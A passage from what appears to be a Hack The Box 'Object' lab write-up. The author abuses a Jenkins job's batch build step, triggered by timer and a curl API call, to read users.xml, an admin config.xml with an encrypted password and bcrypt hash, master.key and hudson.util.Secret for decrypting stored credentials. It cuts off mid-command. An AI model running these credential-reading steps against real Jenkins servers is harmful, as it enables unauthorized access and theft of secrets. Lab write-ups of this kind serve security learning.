/static/c7214f9d6fca4d0cdef6e10c2cf828e8/679a3/create-a-job.png 315w, /static/c7214f9d6fca4d0cdef6e10c2cf828e8/50637/create-a-job.png 630w, /static/c7214f9d6fca4d0cdef6e10c2cf828e8/fddb0/create-a-job.png 945w, /static/c7214f9d6fca4d0cdef6e10c2cf828e8/cfb3a/create-a-job.png 979w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I created a job and selected <code class="language-text">Freestyle project</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/21614eb4de172b091e96bd76f1fce8a0/6d283/freestyle-project.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 98.10126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACj0lEQVR42oWVaY7TQBCF53aciitwFSR+cAT4hQChAaIsjrd4b7f3LeTxqmMPHiXDRPpUXR2n+tXizkOaZojiBF3X4Xw+4zxNZLb0p3F8lXHFA+ZPNwxIcw1VlEh1gSwnukTZdP+lqFv0w7SEwcPlcjELxR9/f/yNX9s9HjdbsjPEqjBELxBmGhUDPwVcFlXbwQ0CBEy/6gaU9A18WFNFlFeI9Ir8SpiXfL6/DdjUDcJTgiSMUKgcJdM3Voldk89cfc0etE2zCjin3CcRDj8+IXJdeIcDTkcLXVGgLysMVUl7Zagqg/FrrvMcf2hvFE6FRh07UFQYez7S0wlZGCJjGRZkT1Dcjz0PKopMwPMzhfOnZb22OxvWZkN1R1RZhiKOoUmZJCiInn3ZX3xZj/2dGsoMySx6vg/bcZ7wqexERQHVLGvji6WvtMY4TbcB+36AH8YITgF8puMRsYpKJ/5g5JwOVNKvEF9EiJjbgDLYmYLjuNjttmSH/X6PAxskwV02K2GaGQ9I0xQ5aydrsdM9hQ1r+NPiHAYhyrIwJzcsdtu2qOvaYFTxYPluzTOFl3lRc4C/bHxYbIht20aRwxoe6R/nPcuyjOLlO9kLWcu7CmWz71rzwImjEbDgERshKQlKKZOi2KWGi8K7ATs+YDnssO1QgUMlFnx2XLOLS9A1Sy2lJPcD8iTb9eF6vklFUoo5Y1K7km+FUAl8S4Slvi92WQbb9wNoSY0nx+yoICmmVJNxAjJ1RZTJAZK2BB3uBuz5poQJvtkhvIw1K2vei9WVovq3nv2E113Cm0autrrtbrs8jA3evv+MN+8+4sPXDe+4CkH68j346n04nSdo1iWrGtTSPZm3YXyVlkz8q1gC/gUFtvoLuINuAgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Freestyle project" title="" src="/static/21614eb4de172b091e96bd76f1fce8a0/50637/freestyle-project.png" srcset="/static/21614eb4de172b091e96bd76f1fce8a0/dda05/freestyle-project.png 158w, /static/21614eb4de172b091e96bd76f1fce8a0/679a3/freestyle-project.png 315w, /static/21614eb4de172b091e96bd76f1fce8a0/50637/freestyle-project.png 630w, /static/21614eb4de172b091e96bd76f1fce8a0/fddb0/freestyle-project.png 945w, /static/21614eb4de172b091e96bd76f1fce8a0/6d283/freestyle-project.png 976w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>On the configuration page, the <code class="language-text">Build</code> section had an <code class="language-text">Add build step</code> dropdown with an <code class="language-text">Execute Windows batch command</code> option:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 592px; " > <a class="gatsby-resp-image-link" href="/static/f51192a8414a32a6d7b86cebd37b0acf/05793/add-build-step.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABVUlEQVR42qWTi06DMBSGef8HMvEhzFwWl81t4hiwQgHLvRfa37beoka2xCZfegj045yeNtBaI89zEEIwDAOEEP8icMIoihCGoRdKKcD5CMkFpPgN53yWwBgN1vTYPyfYHiI7xyD0BXU7oO1HNN0X7vlihlIqRFmN1eMJy80Ri3Xo4/UhxXqfYH8qkNcStJFIyxGs7aGknBc23YCEUBzjFEXJMBmAS+0RykBMgA3Rc4W26/zCP0tWSmEcR9uUM+JThKapIewLY6z1x3Df9n1v93kmQy8crDDLEMexb5CjLEtUVfVNfJVQSI5+6MCqEkVOQLOzz3Icue+6E35IrxJKJVAwhtUuwt3DDvfbJ5xJhsxCaeHPZ5a5mHrZpbMaaCOxS2PcLDa4XTq2iEgCWhHkpZUVKcqKgrHaZ+42/oJQY9LKFqTfMdBG2U6/oewPJz19lu4uwhyvBxZRHC9frMQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Add build step" title="" src="/static/f51192a8414a32a6d7b86cebd37b0acf/05793/add-build-step.png" srcset="/static/f51192a8414a32a6d7b86cebd37b0acf/dda05/add-build-step.png 158w, /static/f51192a8414a32a6d7b86cebd37b0acf/679a3/add-build-step.png 315w, /static/f51192a8414a32a6d7b86cebd37b0acf/05793/add-build-step.png 592w" sizes="(max-width: 592px) 100vw, 592px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I tested this with the <code class="language-text">whoami</code> command:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/240a6551248074696bf2e277da9e2473/2059a/whoami-command.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 49.36708860759494%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABIklEQVR42qWTC26DMBBEuf+ZcpJKhFRN+BnHH8Be26DpmipppZImUpEeI1l4du0dCmMMyrKE9x4ppV+EEJ4S1/X+fZGNhBDQWm8opZCL3JSI/iZGyMMBbVkhsHGRXfu+w/vphPP5A01do+s6tE0D0fcvdUiix+ki4CiiWJaEuld4qy64WsJEK6xfMDLWJegpPMV43jNHzJ4NU27ZOK4U8Z8npGUz3wwHG+DCyiwPmbj63vpMaVM9EsxmyHcopEbZSBxb1lYxGsfum4qxk99nJoyOjz46EN9nkY8a8+i508B4ChwhYv2a4k1TDLvkZAyDhB3HzaPIUxqk4uhIKG3gnN+f5IPYaGMhr+qHIb8EV+jEgKvSmJ17KSr3UPP+2w+Qg/0JhOwHCAsoN1wAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="whoami command" title="" src="/static/240a6551248074696bf2e277da9e2473/50637/whoami-command.png" srcset="/static/240a6551248074696bf2e277da9e2473/dda05/whoami-command.png 158w, /static/240a6551248074696bf2e277da9e2473/679a3/whoami-command.png 315w, /static/240a6551248074696bf2e277da9e2473/50637/whoami-command.png 630w, /static/240a6551248074696bf2e277da9e2473/2059a/whoami-command.png 767w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After clicking save, there was no option to build. Typically, in the left column, there would be a <code class="language-text">Build Now</code> option, but there wasn't:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/459ee6f6f83b8dcfa6ef7cb1816164f6/a579b/test-project-no-build-option.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 91.13924050632912%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAACFUlEQVR42qVU7Y7aMBDM+79J36J/TmpVcYegtIg7EBBBEieO48SxHfIxXbuAOOCuQrU0WjtZjXdndx3kucRmEyKKExhjECcM621I9u+5aRpvP4O11vs5BLZV0Eb5H1pr6LpG33cYhgFuOXvaf7ROPg7BVqTYJ3vsY4YkzcAyDtMcYA8t2RYN2fl8jtFohNlshsVigclkgul0ivF47L+HYXgmD36GwpPFmYCsLcEgL5UHl8oTupQ4zyGlhFIKZVlCCOHPeZ6jpqzOhNZUkIL7H33f439XkIoaUcLBWOI1vNbGLWsbyKrGcKXZPY0DURoISk2pCl3XvSPsj46vmxhfvs7ByDcqahy6jzMJGllBsBQJY16by9tOe60VVotnFLpBYVqIukHX36980JJ+ksUUpURJuJcKzzKs3n4jFRIxF+ClPkd/Q2gbjbIqqFJOv1snJ8NyuaR2ecUvapvxy7PX+zKDd4RCGTC6NUpSxClHpS0EtYw7u0K0F3oNV/ZuhEleYruLsdpsEe4iFETC8gLrcIdMlDi0nae4nIbPJiew1vhxcy3j0nO92HWtt217eLg3A0NT4DrdwTV3RgWoidxB03z3/5jj27Y5viYuUs45ov3ej9fpkr5/kJBlOXZR4uc5peIoQ/Os9Blt92DKk9kcT99+4Pto7PG2DpHR5KRFBUZFcY/DQ4S+asdWcPuOInJpnjA8qOEfreV5AYj7XrUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="test-project no build option" title="" src="/static/459ee6f6f83b8dcfa6ef7cb1816164f6/50637/test-project-no-build-option.png" srcset="/static/459ee6f6f83b8dcfa6ef7cb1816164f6/dda05/test-project-no-build-option.png 158w, /static/459ee6f6f83b8dcfa6ef7cb1816164f6/679a3/test-project-no-build-option.png 315w, /static/459ee6f6f83b8dcfa6ef7cb1816164f6/50637/test-project-no-build-option.png 630w, /static/459ee6f6f83b8dcfa6ef7cb1816164f6/a579b/test-project-no-build-option.png 724w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>However, there are alternative ways to trigger the build. Back on the configuration page in the <code class="language-text">Build Triggers</code> section, one option is by selecting <code class="language-text">Build Periodically</code> to run the build at specified intervals. For example, this would run every minute:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4a6720317c7ff64123c710f5e77dc9a0/fef9b/build-periodically.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 58.86075949367089%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7DAAAOwwHHb6hkAAABkUlEQVR42qVT2XKcMBDk/z/Mldf4KaliMcsuhw5uJCRg6czIxt6yE+9DVNW00Ew1mqEncs6hqioIIQKmacK6rliW5R3e+4dYF49t2xCx4OWS4Xw+I47jINp1HYZhQNu2aJoGnPO92ALZjTDOI/J+xTWvkCQJ0jQNwlmWBbA4C38n6Ehk31b8PEuo3iCa3IY4E0hfElyuVyilMM8zjDGBH5V8CD6ToB4soo1e+q4Nt+He3W63wAfue/kvbJSn+wmWS+YDLgnYse974L+v/Q5f13GR6Cjpf9e7ID+MaWEniWkUMGNJ+xpm0sQEU5OVFMZB0Z7yTEPniuIq5DDPtgtx7x0Lbmh0imvyhCL9QXiCKH5DlglEeSIwx4GVZL8WqIoTxWPCCUqk0Irc0Gvq5fIm2HTIi4rsUxDKwDkxoywlCoqVlUBR8lkBXTd0a4sxwJC1RkzGgrWohyt9VQbfScnTUpF1yAJahz/f9z0lfljn6Pn9FO00Ib/yGvVoX3vIE8H+s9Z+8ph7OCXubVLyesA4e/wB61Gc+S35Z/8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="build periodically" title="" src="/static/4a6720317c7ff64123c710f5e77dc9a0/50637/build-periodically.png" srcset="/static/4a6720317c7ff64123c710f5e77dc9a0/dda05/build-periodically.png 158w, /static/4a6720317c7ff64123c710f5e77dc9a0/679a3/build-periodically.png 315w, /static/4a6720317c7ff64123c710f5e77dc9a0/50637/build-periodically.png 630w, /static/4a6720317c7ff64123c710f5e77dc9a0/fef9b/build-periodically.png 784w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I saved the configuration, and after about a minute the build triggered. I viewed the <code class="language-text">Console Output</code> for the build which showed that the command successfully ran as the user <code class="language-text">oliver</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Started by timer Running as SYSTEM Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project [test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins8835497066393974783.bat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>whoami object\oliver C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 Finished: SUCCESS</code></pre></div> <p>Another option to run the build is via the remote access API. On the configuration page, I selected <code class="language-text">Trigger builds remotely (e.g., from scripts)</code> and gave a token name:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d35f715e703389c2353959f666d09bf6/fd14d/trigger-builds-remotely.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 40.50632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABA0lEQVR42o2S646DIBCFff9X2xcwFS9dNeLdmqwwCDnLYNg0TZrtj8MQBg7fDCRaE8qqQl3XKIoCx3HAGAOtNYjoYym/31qLRJGF+Ja4V6U3LNG2LYZhwDzP6Pse+76HA3zBOxFp1NMDigwSa50/vKBpGkzThG3bggFTRp3n+a+UrzQQ8sA0XHIk48h0HJdlCWvPMWpd1wDB6+RJnfOGzjl0XYcsyyBEjjzPQy+FEGEupfwzf75oHMcQOc/mOhIyLic5weJ5JIi9U0q91eHFPSyHDYc2l2FV3ZGmKW63LJTOZTAJx9d+voq8rPf4yiUeP/oyjL2INPx1oj75MsYQ2vl65V9QP2TOBMVkwgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="trigger builds remotely" title="" src="/static/d35f715e703389c2353959f666d09bf6/50637/trigger-builds-remotely.png" srcset="/static/d35f715e703389c2353959f666d09bf6/dda05/trigger-builds-remotely.png 158w, /static/d35f715e703389c2353959f666d09bf6/679a3/trigger-builds-remotely.png 315w, /static/d35f715e703389c2353959f666d09bf6/50637/trigger-builds-remotely.png 630w, /static/d35f715e703389c2353959f666d09bf6/fd14d/trigger-builds-remotely.png 838w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To use the API, I needed to generate an API key, so I clicked the user icon in the top right of Jenkins and went to <code class="language-text">Configure</code>. On the user configuration page, I selected <code class="language-text">Add new Token</code>, then <code class="language-text">Generate</code>, and copied the token:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ab59dd49ade7a95076ea2dbe72a386ba/7c5b2/api-token.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 30.37974683544304%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAA3UlEQVR42pWQwXLDIAxE/f+/2GmaAyFpcCDYWOAa2Epyk0tyKTPPu0hII2sgIlhrYYyBeDm9d/z3PGqGUjIulzNO9oRwD8/k/qA//XuA2prWjKkoQ60V80yYU2YICxWkpeg9LRmUVySOiy6UNU8kXmoSpJ5yhjk7zXHDDVM4IowHBPepePfFsB+PuHvxB72L3q4fyhQDYpzQeMKy/sDfAuoqDdsG7y2u3wbOWZQ8obeMXkm1NdGyx1R3z5+XPcq0Q2sdkX85xJlJyOvGe+mQ1YjWF/2DA0rb2biZTPsLt+DTW5SgfNIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="API token" title="" src="/static/ab59dd49ade7a95076ea2dbe72a386ba/50637/api-token.png" srcset="/static/ab59dd49ade7a95076ea2dbe72a386ba/dda05/api-token.png 158w, /static/ab59dd49ade7a95076ea2dbe72a386ba/679a3/api-token.png 315w, /static/ab59dd49ade7a95076ea2dbe72a386ba/50637/api-token.png 630w, /static/ab59dd49ade7a95076ea2dbe72a386ba/7c5b2/api-token.png 728w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Jenkins documentation <a href="https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-Submittingjobs" target="_blank">here</a> states that a build can be triggered with a POST request. So I sent the following request:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ curl -u "test:112067325c86c2057a6e5d4c812bc4805e" -X POST "http://object.htb:8080/job/test-project/build?token=test_token"</code></pre></div> <p>After the build completed, I went to the console output which successfully ran the <code class="language-text">whoami</code> command:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Started by remote host 10.10.14.55 Running as SYSTEM Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project [test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins2293941004648113126.bat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>whoami object\oliver C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 Finished: SUCCESS</code></pre></div> <p>Jenkins stores user info in <code class="language-text">%JENKINS_HOME%\users\users.xml</code>, so back in the build configuration, I set the batch command to the following:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">type %JENKINS_HOME%\users\users.xml</code></pre></div> <p>After triggering the build, <code class="language-text">users.xml</code> was displayed in the console output:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Started by remote host 10.10.14.55 Running as SYSTEM Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project [test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins10023837392536135080.bat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\users.xml &lt;?xml version='1.1' encoding='UTF-8'?> &lt;hudson.model.UserIdMapper> &lt;version>1&lt;/version> &lt;idToDirectoryNameMap class="concurrent-hash-map"> &lt;entry> &lt;string>test&lt;/string> &lt;string>test_10072431638714946254&lt;/string> &lt;/entry> &lt;entry> &lt;string>admin&lt;/string> &lt;string>admin_17207690984073220035&lt;/string> &lt;/entry> &lt;/idToDirectoryNameMap> &lt;/hudson.model.UserIdMapper> C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 Finished: SUCCESS</code></pre></div> <p>With the ability to read files on the server, I was able to decrypt Jenkins secrets using the Jenkins Credentials Decryptor tool, which can be found <a href="https://github.com/hoto/jenkins-credentials-decryptor" target="_blank">here</a>. To do so, I needed three files from the Jenkins home directory:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">%JENKINS_HOME%\users\&lt;user_directory_name>\config.xml %JENKINS_HOME%\secrets\master.key %JENKINS_HOME%\secrets\hudson.util.Secret</code></pre></div> <p>So based on <code class="language-text">users.xml</code>, the <code class="language-text">admin</code> user's <code class="language-text">config.xml</code> would be:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">%JENKINS_HOME%\users\admin_17207690984073220035\config.xml</code></pre></div> <p>I set the batch command to:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">type %JENKINS_HOME%\users\admin_17207690984073220035\config.xml</code></pre></div> <p>Once the build completed, I went to the console output to reveal <code class="language-text">config.xml</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Started by remote host 10.10.14.55 Running as SYSTEM Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project [test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins17161737380000944563.bat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035\config.xml &lt;?xml version='1.1' encoding='UTF-8'?> &lt;user> &lt;version>10&lt;/version> &lt;id>admin&lt;/id> &lt;fullName>admin&lt;/fullName> &lt;properties> &lt;com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.6.1"> &lt;domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"> &lt;entry> &lt;com.cloudbees.plugins.credentials.domains.Domain> &lt;specifications/> &lt;/com.cloudbees.plugins.credentials.domains.Domain> &lt;java.util.concurrent.CopyOnWriteArrayList> &lt;com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl> &lt;id>320a60b9-1e5c-4399-8afe-44466c9cde9e&lt;/id> &lt;description>&lt;/description> &lt;username>oliver&lt;/username> &lt;password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}&lt;/password> &lt;usernameSecret>false&lt;/usernameSecret> &lt;/com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl> &lt;/java.util.concurrent.CopyOnWriteArrayList> &lt;/entry> &lt;/domainCredentialsMap> &lt;/com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty> &lt;hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.84"> &lt;triggers/> &lt;/hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty> &lt;hudson.model.MyViewsProperty> &lt;views> &lt;hudson.model.AllView> &lt;owner class="hudson.model.MyViewsProperty" reference="../../.."/> &lt;name>all&lt;/name> &lt;filterExecutors>false&lt;/filterExecutors> &lt;filterQueue>false&lt;/filterQueue> &lt;properties class="hudson.model.View$PropertyList"/> &lt;/hudson.model.AllView> &lt;/views> &lt;/hudson.model.MyViewsProperty> &lt;org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.5"> &lt;providerId>default&lt;/providerId> &lt;/org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty> &lt;hudson.model.PaneStatusProperties> &lt;collapsed/> &lt;/hudson.model.PaneStatusProperties> &lt;jenkins.security.seed.UserSeedProperty> &lt;seed>ea75b5bd80e4763e&lt;/seed> &lt;/jenkins.security.seed.UserSeedProperty> &lt;hudson.search.UserSearchProperty> &lt;insensitiveSearch>true&lt;/insensitiveSearch> &lt;/hudson.search.UserSearchProperty> &lt;hudson.model.TimeZoneProperty/> &lt;hudson.security.HudsonPrivateSecurityRealm_-Details> &lt;passwordHash>#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW&lt;/passwordHash> &lt;/hudson.security.HudsonPrivateSecurityRealm_-Details> &lt;hudson.tasks.Mailer_-UserProperty plugin="mailer@1.34"> &lt;emailAddress>admin@object.local&lt;/emailAddress> &lt;/hudson.tasks.Mailer_-UserProperty> &lt;jenkins.security.ApiTokenProperty> &lt;tokenStore> &lt;tokenList/> &lt;/tokenStore> &lt;/jenkins.security.ApiTokenProperty> &lt;jenkins.security.LastGrantedAuthoritiesProperty> &lt;roles> &lt;string>authenticated&lt;/string> &lt;/roles> &lt;timestamp>1634793332195&lt;/timestamp> &lt;/jenkins.security.LastGrantedAuthoritiesProperty> &lt;/properties> &lt;/user> C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 Finished: SUCCESS</code></pre></div> <p>To read <code class="language-text">master.key</code>, I set the batch command to:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">type %JENKINS_HOME%\secrets\master.key</code></pre></div> <p>Console output:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Started by remote host 10.10.14.55 Running as SYSTEM Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project [test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins8435746844721434956.bat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\master.key f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e564cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f9165679595b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19 C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 Finished: SUCCESS</code></pre></div> <p>To read <code class="language-text">hudson.util.Secret</code>, I set the batch command to:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">type %JENKINS_HOME%\secrets\hudson.util.Secret</code></pre></div> <p>Console output:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Started by remote host 10.10.14.55 Running as SYSTEM Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project [test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins6004140155461822663.bat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>type C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret �aPTñ‹ìQw3訾®Ã€ƒg·¢dw-J) uM†’,Ábˆn¨ \îÙ!Ë÷s¢E¹Ä1âªaí;>©×õU‹‡¾Õµÿ™Þ8 îƽ¿xd$³ÌYU ©k1Α}ôAö»Ýv–…í„�¬©• `K� 8 D�aIâXÒD-Å"´¾¯í‹äGt\ñQå_]Æš”�Ç>J/©«ÎL('ÞìU§ �JÌ“á­|R´7Šè=vP7ˆ:ˆDÕ{ºKI8²Äžû!U�ק“úêXÊ P¿fŠáE4ìLܤ^ˆöð‡*áËù‚ZˆuÒ®tdÊ„! 7zßQ" C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 Finished: SUCCESS</code></pre></div> <p>Since <code class="language-text">hudson.util.Secret</code> was a binary, I needed to convert it to base64 to copy it. So I set the batch command to:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">powershell -c [convert]::ToBase64String((cat %JENKINS_HOME%\secrets\hudson.util.Secret -Encoding byte))</code></pre></div> <p>Then, it was outputted as base64:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Started by remote host 10.10.14.55 Running as SYSTEM Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project [test-project] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins16252520389882112308.bat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>powershell -c [convert]::ToBase64String((cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret -Encoding byte)) gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA= C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test-project>exit 0 Finished: SUCCESS</code></pre></div> <p>I copied the string and base64 decoded it into a file:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Object] └─$ echo 